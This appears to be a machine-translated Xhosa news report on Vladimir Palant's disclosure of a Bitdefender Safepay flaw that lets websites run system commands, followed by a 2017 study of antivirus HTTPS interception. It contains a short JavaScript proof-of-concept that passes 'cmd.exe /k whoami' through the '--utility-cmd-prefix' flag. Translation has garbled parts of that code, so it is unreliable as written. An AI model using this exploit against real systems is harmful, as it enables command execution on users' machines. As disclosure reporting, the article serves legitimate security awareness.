UVladimir Palant, umdali we-Adblock Plus, () kwisikhangeli sewebhu esikhethekileyo se-Safepay esekwe kwi-injini yeChromium, enikezelwa njengenxalenye ye-Bitdefender Total Security 2020 iphakheji ye-antivirus kwaye ijolise ekwandiseni ukhuseleko lomsebenzi womsebenzisi kuthungelwano lwehlabathi (umzekelo, ukongezwa okongeziweyo kubonelelwa xa ufikelela kwiibhanki kwaye iinkqubo zokuhlawula). Ubuthathaka buvumela iiwebhusayithi ezivulwe kwisikhangeli ukuba zenze ikhowudi engafanelekanga kwinqanaba lenkqubo yokusebenza.
Unobangela wengxaki kukuba i-antivirus ye-Bitdefender yenza uthintelo lwasekhaya lwetrafikhi ye-HTTPS ngokutshintsha isiqinisekiso se-TLS sokuqala sendawo. Isatifikethi esongezelelweyo sengcambu sifakwe kwisistim somthengi, okwenza kube lula ukufihla ukusebenza kwenkqubo yokuhlola i-traffic esetyenziswayo. I-antivirus izifaka kwitrafikhi ekhuselweyo kwaye ifake ikhowudi yayo yeJavaScript kwamanye amaphepha ukuphumeza umsebenzi woPhendlo oluKhuselekileyo, kwaye kwimeko yeengxaki zesatifikethi soqhagamshelwano olukhuselekileyo, ithatha indawo yephepha lemposiso elibuyisiweyo ngelayo. Ekubeni iphepha elitsha lempazamo linikezelwa egameni lomncedisi ovulwayo, amanye amaphepha kuloo mncedisi anofikelelo olupheleleyo kumxholo ofakwe yi-Bitdefender.
Xa uvula indawo elawulwa ngumhlaseli, eso siza sinokuthumela i-XMLHttpRequest kwaye sibonise iingxaki ngesatifikethi se-HTTPS xa uphendula, okuya kukhokelela ekubuyiselweni kwephepha lephutha elichithwa yi-Bitdefender. Ekubeni iphepha lempazamo livulwe kumxholo wesizinda somhlaseli, unokufunda imixholo yephepha le-spoofed kunye ne-Bitdefender parameters. Iphepha elinikezwe yiBitdefender likwaqulethe isitshixo seseshoni esikuvumela ukuba usebenzise iBitdefender API yangaphakathi ukuphehlelela iseshoni yesikhangeli se-Safepay eyahlukileyo, ichaza iiflegi zomgca womyalelo ongenasizathu, kwaye uqalise nayiphi na imiyalelo yenkqubo usebenzisa “--utility-cmd-prefix” iflegi. Umzekelo wokuxhaphaza (iparam1 kunye neparam2 ngamaxabiso afunyenwe kwiphepha lempazamo):
var isicelo = entsha XMLHttpRequest ();
request.open("POST", Math.random());
request.setRequestHeader("Uhlobo-lomxholo", "isicelo/x-www-form-urlencoded");
request.setRequestHeader(«BDNDSS_B67EA559F21B487F861FDA8A44F01C50», param1);
request.setRequestHeader(«BDNDCA_BBACF84D61A04F9AA66019A14B035478», param2);
request.setRequestHeader(«BDNDWB_5056E556833D49C1AF4085CB254FC242», «obk.run»);
request.setRequestHeader(«BDNDOK_4E961A95B7B44CBCA1907D3D3643370D», location.href);
request.send("data:text/html,nada —utility-cmd-prefix=\"cmd.exe /k whoami & echo\"");
Masikhumbule ukuba uphando olwenziwe ngo-2017 ukuba i-24 ngaphandle kwe-26 evavanyiweyo yeemveliso ze-antivirus ezihlola itrafikhi ye-HTTPS nge-spoofing yesatifikethi zinciphise umgangatho wokhuseleko jikelele woqhagamshelwano lwe-HTTPS.
Ziimveliso ezili-11 kuphela kwezingama-26 ezibonelele ngee-suite ze-cipher zangoku. Iinkqubo ze-5 azizange ziqinisekise izatifikethi (i-Kaspersky Internet Security 16 Mac, NOD32 AV 9, CYBERsitter, Net Nanny 7 Win, Net Nanny 7 Mac). I-Kaspersky Internet Security kunye neemveliso zoKhuseleko zizonke zaziphantsi kokuhlaselwa , kunye ne-AVG, i-Bitdefender kunye neemveliso ze-Bullguard zihlaselwa и . I-Dr.Web Antivirus 11 ikuvumela ukuba ubuyele umva kwii-ciphers ezingathembekiyo zokuthumela ngaphandle (uhlaselo ).
umthombo: opennet.ru